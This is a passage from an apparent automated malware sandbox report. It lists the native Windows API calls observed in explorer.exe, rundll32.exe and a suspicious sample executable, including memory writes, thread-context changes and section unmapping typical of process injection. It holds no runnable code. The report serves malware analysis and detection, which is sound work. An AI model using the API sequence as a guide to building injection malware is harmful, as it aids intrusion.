          Source: C:\Windows\explorer.exeCode function: 2_2_04B9D9D2 NtDeleteFile,NtCreateFile,NtClose,NtReadFile,NtClose,NtWriteFile,NtClose,2_2_04B9D9D2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999840 NtDelayExecution,LdrInitializeThunk,4_2_04999840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999860 NtQuerySystemInformation,LdrInitializeThunk,4_2_04999860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049999A0 NtCreateSection,LdrInitializeThunk,4_2_049999A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049995D0 NtClose,LdrInitializeThunk,4_2_049995D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04999910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999540 NtReadFile,LdrInitializeThunk,4_2_04999540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999560 NtWriteFile,LdrInitializeThunk,4_2_04999560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049996D0 NtCreateKey,LdrInitializeThunk,4_2_049996D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049996E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_049996E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999610 NtEnumerateValueKey,LdrInitializeThunk,4_2_04999610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999A50 NtCreateFile,LdrInitializeThunk,4_2_04999A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999650 NtQueryValueKey,LdrInitializeThunk,4_2_04999650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04999660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999780 NtMapViewOfSection,LdrInitializeThunk,4_2_04999780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999FE0 NtCreateMutant,LdrInitializeThunk,4_2_04999FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999710 NtQueryInformationToken,LdrInitializeThunk,4_2_04999710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999B00 NtSetValueKey,LdrInitializeThunk,4_2_04999B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999770 NtSetInformationFile,LdrInitializeThunk,4_2_04999770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049998A0 NtWriteVirtualMemory,4_2_049998A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049998F0 NtReadVirtualMemory,4_2_049998F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999820 NtEnumerateKey,4_2_04999820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0499B040 NtSuspendThread,4_2_0499B040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049999D0 NtCreateProcessEx,4_2_049999D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049995F0 NtQueryInformationFile,4_2_049995F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0499AD30 NtSetContextThread,4_2_0499AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999520 NtWaitForSingleObject,4_2_04999520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999950 NtQueueApcThread,4_2_04999950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999A80 NtOpenDirectoryObject,4_2_04999A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999A10 NtQuerySection,4_2_04999A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999A00 NtProtectVirtualMemory,4_2_04999A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999A20 NtResumeThread,4_2_04999A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999670 NtQueryInformationProcess,4_2_04999670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0499A3B0 NtGetContextThread,4_2_0499A3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_049997A0 NtUnmapViewOfSection,4_2_049997A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0499A710 NtOpenProcessToken,4_2_0499A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999730 NtQueryVirtualMemory,4_2_04999730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0499A770 NtOpenThread,4_2_0499A770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04999760 NtOpenProcess,4_2_04999760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9C90 NtCreateFile,4_2_008A9C90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9DC0 NtClose,4_2_008A9DC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9D40 NtReadFile,4_2_008A9D40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9E70 NtAllocateVirtualMemory,4_2_008A9E70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9C8A NtCreateFile,4_2_008A9C8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9DBA NtClose,4_2_008A9DBA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9D3A NtReadFile,4_2_008A9D3A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A9EEA NtAllocateVirtualMemory,4_2_008A9EEA
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeCode function: 24_2_0042FE90 NtdllDefWindowProc_A,24_2_0042FE90
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeCode function: 24_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,24_2_00458F00
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_0040C3400_2_0040C340
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_00452DE00_2_00452DE0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_0044D1BC0_2_0044D1BC
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_0046724C0_2_0046724C
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_0041E11B1_2_0041E11B
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00402D871_2_00402D87
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_0041D6411_2_0041D641
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_0041E6451_2_0041E645
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00409E301_2_00409E30
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A620A01_2_00A620A0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A4B0901_2_00A4B090
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00AF10021_2_00AF1002
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A541201_2_00A54120
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A3F9001_2_00A3F900
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A6EBB01_2_00A6EBB0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A4841F1_2_00A4841F
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A625811_2_00A62581
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A4D5E01_2_00A4D5E0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A30D201_2_00A30D20
          Source: C:\Users\user\Desktop\M015Tob0Z8.exe